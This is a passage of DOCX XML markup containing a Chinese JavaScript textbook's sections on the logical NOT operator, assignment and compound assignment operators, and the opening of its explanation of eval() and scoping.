        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是假值，则</w:t>
      </w:r>
      <w:r>
        <w:t>!x</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>“||”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符不同，</w:t>
      </w:r>
      <w:r>
        <w:t>“!”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符首先将其操作数转换为布尔值（参照第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>章讲述的转换规则），然后再对布尔值求反。也就是说</w:t>
      </w:r>
      <w:r>
        <w:t>“!”</w:t>
      </w:r>
      <w:r>
        <w:t>总是返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，并且，可以通过使用两次逻辑非运算来得到一个值的等价布尔值：</w:t>
      </w:r>
      <w:r>
        <w:t>!!x</w:t>
      </w:r>
      <w:r>
        <w:t>（参照</w:t>
      </w:r>
      <w:r>
        <w:t>3.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>作为一个一元运算符，</w:t>
      </w:r>
      <w:r>
        <w:t>“!”</w:t>
      </w:r>
      <w:r>
        <w:t>具有很高的优先级，并且和操作数紧密绑定在一起。如果你希望对类似</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>的表达式做求反操作，则需要使用圆括号：</w:t>
      </w:r>
      <w:r>
        <w:t>!(p</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>q)</w:t>
      </w:r>
      <w:r>
        <w:t>。布尔计算的更多原理性知识不必要做过多的解释，这里仅用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码做简单说明：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>取任意值，这两个等式都永远成立</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>!(p</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>q)===!p||!q</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>!(p||q)===!p</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>!q</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="4_11_Fu_Zhi_Biao_Da_Shi_"/>
      <w:r>
        <w:t>4.11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　赋值表达式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>“=”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符来给变量或者属性赋值。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>i=0//</w:t>
      </w:r>
      <w:r>
        <w:t>将变量</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.x=1//</w:t>
      </w:r>
      <w:r>
        <w:t>将对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“=”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符希望它的左操作数是一个左值：一个变量或者对象属性（或数组元素）。它的右操作数可以是任意类型的任意值。赋值表达式的值就是右操作数的值。赋值表达式的副作用是，右操作数的值赋值给左侧的变量或对象属性，这样的话，后续对这个变量和对象属性的引用都将得到这个值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管赋值表达式通常非常简单，但有时仍会看到一些复杂表达式包含赋值表达式的情况。例如，可以将赋值和检测操作放在一个表达式中，就像这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(a=b)==0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果这样做的话，应当清楚地知道</w:t>
      </w:r>
      <w:r>
        <w:t>“=”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符之间的区别！需要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>“=”</w:t>
      </w:r>
      <w:r>
        <w:t>具有非常</w:t>
      </w:r>
      <w:r>
        <w:t>低的优先级，通常在一个较长的表达式中用到了一条赋值语句的值的时候，需要补充圆括号以保证正确的运算顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>赋值操作符的结合性是从右至左，也就是说，如果一个表达式中出现了多个赋值运算符，运算顺序是从右到左。因此，可以通过如下的方式来对多个变量赋值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>i=j=k=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>把三个变量初始化为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="Dai_Cao_Zuo_De_Fu_Zhi_Yun_Suan_"/>
      <w:r>
        <w:t>带操作的赋值运算</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了常规的赋值运算</w:t>
      </w:r>
      <w:r>
        <w:t>“=”</w:t>
      </w:r>
      <w:r>
        <w:t>之外，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>还支持许多其他的赋值运算符，这些运算符将赋值运算符和其他运算符连接起来，提供一种更为快捷的运算方式。例如，运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“+=”</w:t>
      </w:r>
      <w:r>
        <w:t>执行的是加法运算和赋值操作，下面的表达式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>total+=sales_tax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和接下来的表达式是等价的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>total=total+sales_tax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“+=”</w:t>
      </w:r>
      <w:r>
        <w:t>可以作用于数字或字符串，如果其操作数是数字，它将执行加法运算和赋值操作；如果操作数是字符串，它就执行字符串连接操作和赋值操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这类运算符还包括</w:t>
      </w:r>
      <w:r>
        <w:t>“-=”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“*=”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>等。表</w:t>
      </w:r>
      <w:r>
        <w:t>4-2</w:t>
      </w:r>
      <w:r>
        <w:t>列出了这一类的所有运算符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2035833" cy="2428335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="11" name="00011.jpeg" descr="000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00011.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2035833" cy="2428335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在大多数情况下，表达式为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a op=b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这里</w:t>
      </w:r>
      <w:r>
        <w:t>op</w:t>
      </w:r>
      <w:r>
        <w:t>代表一个运算符，这个表达式和下面的表达式等价：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=a op b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在第一行中，表达式</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>计算了一次，在第二行中，表达式</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>计算了两次。只有在</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>包含具有副作用的表达式（比如函数调用和赋值操作）的时候，两者才不等价。比如，下面两个表达式就不等价：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data[i++]*=2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>data[i++]=data[i++]*2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="4_12_Biao_Da_Shi_Ji_Suan_"/>
      <w:r>
        <w:t>4.12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　表达式计算</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和其他很多解释性语言一样，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>同样可以解释运行由</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>源代码组成的字符串，并产生一个值。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>通过全局函数</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>来完成这个工作：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>eval("3+2")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>动态判断源代码中的字符串是一种强大的语言特性，几乎没有必要在实际中应用。如果你使用了</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>，你应当仔细考虑是否真的需要使用它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面讲解</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>的基础用法，并且介绍严格使用它的两种方法，从代码优化的角度讲，这两种方法对于原有代码造成的影响是最小的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>是一个函数还是一个运算</w:t>
      </w:r>
      <w:r>
        <w:t>符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>是一个函数，但由于它已经被当成运算符来对待了，因此将它放在本章来讲述。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言的早期版本定义了</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，从那时起，该语言的设计者和解释器的作者对其实施了更多限制，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>使其看起来更像运算符。现代</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器进行了大量的代码分析和优化。而</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>的问题在于，用于动态执行的代码通常来讲是不能分析。一般来讲，如果一个函数调用了</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>，那么解释器将无法对这个函数做进一步优化。而将</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>定义为函数的另一个问题是，它可以被赋予其他的名字：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var f=e</w:t>
      </w:r>
      <w:r>
        <w:t>val;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var g=f;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果允许这种情况的话，那么解释器将无法放心地优化任何调用</w:t>
      </w:r>
      <w:r>
        <w:t>g()</w:t>
      </w:r>
      <w:r>
        <w:t>的函数。而当</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>是一个运算符（并作为一个保留字）的时候，这种问题就可以避免掉。接下来的</w:t>
      </w:r>
      <w:r>
        <w:t>4.12.2</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>4.12.3</w:t>
      </w:r>
      <w:r>
        <w:t>节将会介绍如何对</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>实施更多的限制，以便让它的行为更接近运算符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="4_12_1_eval__"/>
      <w:r>
        <w:t>4.12.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>只有一个参数。如果传入的参数不是字符串，它直接返回这个参数。如果参数是字符串，它会把字符串当成</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码进行编译（</w:t>
      </w:r>
      <w:r>
        <w:t>parse</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>，如果编译失败则抛出一个语法错误（</w:t>
      </w:r>
      <w:r>
        <w:t>Synt</w:t>
      </w:r>
      <w:r>
        <w:t>axError</w:t>
      </w:r>
      <w:r>
        <w:t>）异常。如果编译成功，则开始执行这段代码，并返回字符串中的最后一个表达式或语句的值，如果最后一个表达式或语句</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>没有值，则最终返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。如果字符串抛出一个异常，这个异常将把该调用传递给</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>最重要的是，它使用了调用它的变量作用域环境。也就是说，它查找变量的值和定义新变量和函数的操作和局部作用域中的代码完全一样。如果一个函数定义了一个局部变量</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，然后调用</w:t>
      </w:r>
      <w:r>
        <w:t>eval("x")</w:t>
      </w:r>
      <w:r>
        <w:t>，它会返回局部变量的值。如果它调用</w:t>
      </w:r>
      <w:r>
        <w:t>eval("x=1")</w:t>
      </w:r>
      <w:r>
